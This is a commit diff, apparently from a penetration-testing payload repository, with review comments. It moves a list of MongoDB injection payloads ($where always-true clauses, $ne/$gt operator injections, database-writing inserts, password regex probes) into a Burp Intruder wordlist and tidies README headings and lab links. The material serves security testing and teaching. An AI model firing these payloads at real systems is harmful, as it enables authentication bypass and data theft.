
Commit 29f4693

NoSQL + Open Redirect
1 parent 6795bee commit 29f4693

5 files changed

+137
-161
lines changed

Mass Assignment/README.md

+1
Original file line numberDiff line numberDiff line change
@@ -33,6 +33,7 @@ If the web application is not checking which parameters are allowed to be update
3333

3434
* [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
3535
* [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
36+
* [Root Me - API - Mass Assignment](https://www.root-me.org/en/Challenges/Web-Server/API-Mass-Assignment)
3637

3738

3839
## References

NoSQL Injection/Intruder/MongoDB.txt

+20
@@ -0,0 +1,20 @@
1+
true, $where: '1 == 1'
2+
, $where: '1 == 1'
3+
$where: '1 == 1'
4+
', $where: '1 == 1'
5+
1, $where: '1 == 1'
6+
{ $ne: 1 }
7+
', $or: [ {}, { 'a':'a
8+
' } ], $comment:'successful MongoDB injection'
9+
db.injection.insert({success:1});
10+
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
11+
|| 1==1
12+
' && this.password.match(/.*/)//+%00
13+
' && this.passwordzz.match(/.*/)//+%00
14+
'%20%26%26%20this.password.match(/.*/)//+%00
15+
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
16+
{$gt: ''}
17+
[$ne]=1
18+
';return 'a'=='a' && ''=='
19+
";return(true);var xyz='a
20+
0;return true
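Review bot: lines 9-10 of this new wordlist (`db.injection.insert({success:1});` and the `mapReduce` variant) are write operations, not probes, and a fuzzing run that lands one in a `$where` context creates a collection on the target; either drop them from the Intruder list or move them to a clearly labelled "non-read-only" list so a tester does not spray them blindly. Lines 12-13 and 14-15 are the same two payloads once raw and once URL-encoded (`' && this.password.match(/.*/)//+%00` versus `'%20%26%26%20this.password.match(/.*/)//+%00`); Intruder applies its own URL-encoding to the payload position by default, so the pre-encoded pair gets double-encoded in a normal run. Keep one form and say which encoding the list assumes. It would also help to separate the operator-injection entries (`{ $ne: 1 }`, `{$gt: ''}`, `[$ne]=1`) from the JavaScript/`$where` entries, since they target different sinks and are not interchangeable.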

NoSQL Injection/README.md

+12-37
@@ -8,13 +8,12 @@
88
* [Tools](#tools)
99
* [Methodology](#methodology)
1010
* [Authentication Bypass](#authentication-bypass)
11-
* [Extract length information](#extract-length-information)
12-
* [Extract data information](#extract-data-information)
11+
* [Extract Length Information](#extract-length-information)
12+
* [Extract Data Information](#extract-data-information)
1313
* [Blind NoSQL](#blind-nosql)
14-
* [POST with JSON body](#post-with-json-body)
15-
* [POST with urlencoded body](#post-with-urlencoded-body)
14+
* [POST with JSON Body](#post-with-json-body)
15+
* [POST with urlencoded Body](#post-with-urlencoded-body)
1616
* [GET](#get)
17-
* [MongoDB Payloads](#mongodb-payloads)
1817
* [Labs](#references)
1918
* [References](#references)
2019
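Review bot: the `* [Labs](#references)` entry in the unchanged context points at the References anchor, so the TOC link skips the Labs section this commit keeps at the end of the file; change it to `* [Labs](#labs)`. While title-casing the entries, `POST with urlencoded Body` leaves "urlencoded" lowercase; `POST with URL-encoded Body` (or `Urlencoded`) would match the treatment given to the other headings. Removing the `MongoDB Payloads` entry is consistent with the section deletion below, but no entry or link to the new `Intruder/MongoDB.txt` file replaces it.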

@@ -30,7 +29,7 @@
3029

3130
### Authentication Bypass
3231

33-
Basic authentication bypass using not equal ($ne) or greater ($gt)
32+
Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
3433

3534
* in HTTP data
3635
```ps1
@@ -49,14 +48,16 @@ Basic authentication bypass using not equal ($ne) or greater ($gt)
4948
```
5049

5150

52-
### Extract length information
51+
### Extract Length Information
52+
53+
Inject a payload using the $regex operator. The injection will work when the length is correct.
5354

5455
```ps1
5556
username[$ne]=toto&password[$regex]=.{1}
5657
username[$ne]=toto&password[$regex]=.{3}
5758
```
5859

59-
### Extract data information
60+
### Extract Data Information
6061

6162
Extract data with "`$regex`" query operator.
6263

@@ -86,7 +87,7 @@ Extract data with "`$in`" query operator.
8687

8788
## Blind NoSQL
8889

89-
### POST with JSON body
90+
### POST with JSON Body
9091

9192
Python script:
9293

@@ -112,7 +113,7 @@ while True:
112113
password += c
113114
```
114115

115-
### POST with urlencoded body
116+
### POST with urlencoded Body
116117

117118
Python script:
118119

@@ -140,7 +141,7 @@ while True:
140141

141142
### GET
142143

143-
python script:
144+
Python script:
144145

145146
```python
146147
import requests
@@ -191,32 +192,6 @@ end
191192
```
192193

193194

194-
## MongoDB Payloads
195-
196-
```bash
197-
true, $where: '1 == 1'
198-
, $where: '1 == 1'
199-
$where: '1 == 1'
200-
', $where: '1 == 1'
201-
1, $where: '1 == 1'
202-
{ $ne: 1 }
203-
', $or: [ {}, { 'a':'a
204-
' } ], $comment:'successful MongoDB injection'
205-
db.injection.insert({success:1});
206-
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
207-
|| 1==1
208-
' && this.password.match(/.*/)//+%00
209-
' && this.passwordzz.match(/.*/)//+%00
210-
'%20%26%26%20this.password.match(/.*/)//+%00
211-
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
212-
{$gt: ''}
213-
[$ne]=1
214-
';return 'a'=='a' && ''=='
215-
";return(true);var xyz='a
216-
0;return true
217-
```
218-
219-
220195
## Labs
221196

222197
* [Root Me - NoSQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/NoSQL-injection-Authentication)
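Review bot: deleting the `## MongoDB Payloads` section removes the README's only copy of these payloads, and nothing in this file now points at the `NoSQL Injection/Intruder/MongoDB.txt` file they were moved to, so a reader of the README loses them. Add a reference where the section was or under Tools, e.g. `* [Intruder/MongoDB.txt](Intruder/MongoDB.txt) - payload list for Burp Intruder`, so the move is discoverable.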

OAuth Misconfiguration/README.md

+2-2
@@ -8,7 +8,7 @@
88
- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
99
- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
1010
- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
11-
- [OAuth private key disclosure](#oauth-private-key-disclosure)
11+
- [OAuth Private Key Disclosure](#oauth-private-key-disclosure)
1212
- [Authorization Code Rule Violation](#authorization-code-rule-violation)
1313
- [Cross-Site Request Forgery](#cross-site-request-forgery)
1414
- [Labs](#labs)
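Review bot: only the `OAuth Private Key Disclosure` entry is title-cased here while the neighbouring entries (`Stealing OAuth Token via referer`, `Grabbing OAuth Token via redirect_uri`, `Executing XSS via redirect_uri`) keep their original casing; apply the same convention across the list or leave this one as it was so the TOC reads uniformly.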
@@ -52,7 +52,7 @@ https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca
5252
```
5353

5454

55-
## OAuth private key disclosure
55+
## OAuth Private Key Disclosure
5656

5757
Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
5858
